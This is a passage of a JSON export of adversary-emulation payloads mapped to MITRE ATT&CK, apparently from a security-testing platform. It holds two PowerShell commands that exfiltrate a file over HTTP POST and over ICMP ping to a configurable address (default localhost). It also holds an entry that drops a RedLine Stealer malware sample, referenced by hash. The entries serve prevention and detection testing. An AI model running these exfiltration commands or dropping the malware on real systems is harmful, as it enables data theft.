        "attack_pattern_name": "Exfiltration Over Unencrypted Non-C2 Protocol",
        "attack_pattern_description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
        "attack_pattern_external_id": "T1048.003",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "Exfiltration Over Alternative Protocol - HTTP",
      "payload_description": "Exfiltration of specified file over HTTP.\nUpon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.\n",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "2510c51f-dfce-4b7f-b860-1b69ed4654b7",
          "attack_pattern_name": "Exfiltration Over Unencrypted Non-C2 Protocol",
          "attack_pattern_description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
          "attack_pattern_external_id": "T1048.003",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": null,
      "payload_cleanup_command": null,
      "payload_elevation_required": false,
      "payload_arguments": [
        {
          "type": "text",
          "key": "input_file",
          "default_value": "C:\\Windows\\System32\\notepad.exe",
          "description": null,
          "separator": null
        },
        {
          "type": "text",
          "key": "ip_address",
          "default_value": "http://127.0.0.1",
          "description": null,
          "separator": null
        }
      ],
      "payload_prerequisites": [],
      "payload_external_id": "33073100-f642-4351-b330-625e548a344d",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-06-20T09:48:40.940405Z",
      "payload_updated_at": "2025-07-30T05:22:54.048862Z",
      "command_executor": "psh",
      "command_content": "$content = Get-Content #{input_file}\nInvoke-WebRequest -Uri #{ip_address} -Method POST -Body $content\n",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        },
        {
          "domain_name": "Data Exfiltration",
          "domain_color": "#9933CC"
        },
        {
          "domain_name": "Network",
          "domain_color": "#009933"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "2510c51f-dfce-4b7f-b860-1b69ed4654b7",
        "attack_pattern_name": "Exfiltration Over Unencrypted Non-C2 Protocol",
        "attack_pattern_description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
        "attack_pattern_external_id": "T1048.003",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "Exfiltration Over Alternative Protocol - ICMP",
      "payload_description": "Exfiltration of specified file over ICMP protocol.\n\nUpon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.\n",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "2510c51f-dfce-4b7f-b860-1b69ed4654b7",
          "attack_pattern_name": "Exfiltration Over Unencrypted Non-C2 Protocol",
          "attack_pattern_description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
          "attack_pattern_external_id": "T1048.003",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": null,
      "payload_cleanup_command": null,
      "payload_elevation_required": false,
      "payload_arguments": [
        {
          "type": "text",
          "key": "input_file",
          "default_value": "C:\\Windows\\System32\\notepad.exe",
          "description": null,
          "separator": null
        },
        {
          "type": "text",
          "key": "ip_address",
          "default_value": "127.0.0.1",
          "description": null,
          "separator": null
        }
      ],
      "payload_prerequisites": [],
      "payload_external_id": "16e5f26d-e92f-4a2f-8894-abbf29087153",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-06-20T09:48:40.920388Z",
      "payload_updated_at": "2025-07-30T05:22:43.528118Z",
      "command_executor": "psh",
      "command_content": "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send(\"#{ip_address}\", 1500, $Data) }\n",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        },
        {
          "domain_name": "Data Exfiltration",
          "domain_color": "#9933CC"
        },
        {
          "domain_name": "Network",
          "domain_color": "#009933"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "2510c51f-dfce-4b7f-b860-1b69ed4654b7",
        "attack_pattern_name": "Exfiltration Over Unencrypted Non-C2 Protocol",
        "attack_pattern_description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
        "attack_pattern_external_id": "T1048.003",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": false,
    "payload_information": {
      "payload_type": "FileDrop",
      "payload_name": "Drop RedLine Stealer",
      "payload_description": "Drop a recent version of the RedLine Stealer.",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "53245640-e41b-49c5-a29d-05cc5188be33",
          "attack_pattern_name": "Browser Information Discovery",
          "attack_pattern_description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)\n\nBrowser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)",
          "attack_pattern_external_id": "T1217",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": null,
      "payload_cleanup_command": null,
      "payload_elevation_required": false,
      "payload_arguments": [],
      "payload_prerequisites": [],
      "payload_external_id": "db574d13-5004-47cd-9bba-1bbd2b3ccb1a",
      "payload_source": "FILIGRAN",
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_tags": [
        "ca426800-9452-470a-a799-19e9ca64d9a5",
        "9698ff4f-84be-4ecf-ad28-a2d949a2ad2a"
      ],
      "payload_created_at": "2025-06-29T13:09:02.196324Z",
      "payload_updated_at": "2025-06-29T13:09:25.362561Z",
      "payload_output_parsers": [],
      "file_drop_file": "cd524ce4-aa0f-4252-bfa6-b929e7d6a5d3",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [
      {
        "tag_id": "ca426800-9452-470a-a799-19e9ca64d9a5",
        "tag_name": "malware",
        "tag_color": "#cf1111"
      },
      {
        "tag_id": "9698ff4f-84be-4ecf-ad28-a2d949a2ad2a",
        "tag_name": "stealer",
        "tag_color": "#8e5dd6"
      },
      {
        "tag_id": "ca426800-9452-470a-a799-19e9ca64d9a5",
        "tag_name": "malware",
        "tag_color": "#cf1111"
      }
    ],
    "payload_document": {
      "document_id": "cd524ce4-aa0f-4252-bfa6-b929e7d6a5d3",
      "document_name": "d10865bd6526c7578c27e6c1d76fd3c6feb3b11fff8e0d0a3b41090a525b8bc1.exe",
      "document_target": "dd1853bf4e3943a02cc0efd8b53baa44.exe",
      "document_description": null,
      "document_tags": [
        "ca426800-9452-470a-a799-19e9ca64d9a5"
      ],
      "document_path": "malware/stealer/windows/Drop RedLine Stealer/attachments.zip"
    },
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "53245640-e41b-49c5-a29d-05cc5188be33",
        "attack_pattern_name": "Browser Information Discovery",
        "attack_pattern_description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)\n\nBrowser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)",
        "attack_pattern_external_id": "T1217",
        "attack_pattern_kill_chain_phases": null
      }
    ]
  }
]